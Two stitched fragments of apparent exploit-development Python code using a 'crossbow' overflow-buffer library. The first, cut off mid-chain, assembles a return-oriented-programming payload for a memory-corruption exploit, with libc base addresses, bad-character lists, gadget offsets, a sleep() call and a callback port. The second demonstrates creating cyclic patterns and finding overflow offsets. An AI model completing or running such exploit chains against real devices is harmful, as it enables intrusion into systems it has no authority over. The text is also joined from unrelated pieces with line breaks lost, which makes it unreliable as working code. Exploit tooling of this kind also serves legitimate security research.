CALLBACK_PORT="8080" qemu=False libc_qemu_base=0x4084a000 libc_actual_base=0x2aaee000 libc_base=0 if qemu: libc_base=libc_qemu_base else: libc_base=libc_actual_base badchars=['\0',0x0d,'\n',0x20] buf=EmptyOverflowBuffer(LittleEndian,default_base=libc_base,badchars=badchars,maxlength=2048) buf.add_pattern(528) #function_epilogue_rop buf.add_rop_gadget(0x31b44, description="[$ra] function epilogue that sets up $s1-$s7") buf.add_pattern(620-buf.len()) #address of sleep buf.add_rop_gadget(0x506c0, description="Address of sleep() in libc. be sure to set up $ra and $a0 before calling.") buf.add_pattern(628-buf.len()) #placeholder address that can be dereferenced without crashing, this goes in $s2
# - Tactical Network Solutions, LLC # # See LICENSE.txt for more details. # import sys import os sys.path.insert(0,os.path.abspath('..')) from crossbow.overflow_development.overflowbuilder import EmptyOverflowBuffer from crossbow.common.support import BigEndian from crossbow.common.support import Logging logger=Logging() logger.LOG_INFO("Creating empty overflow buffer") buf=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6']) buf.add_pattern(1024) logger.LOG_INFO("Length of empty overflow buffer: %d" % buf.len()) buf.print_section_descriptions() print buf.pretty_string() logger.LOG_INFO("Offet of \"u3Au4\": %d" % buf.find_offset("u3Au4")) logger.LOG_INFO("Creating second emtpy overflow buffer") buf2=EmptyOverflowBuffer(BigEndian,badchars=['A','B','6'])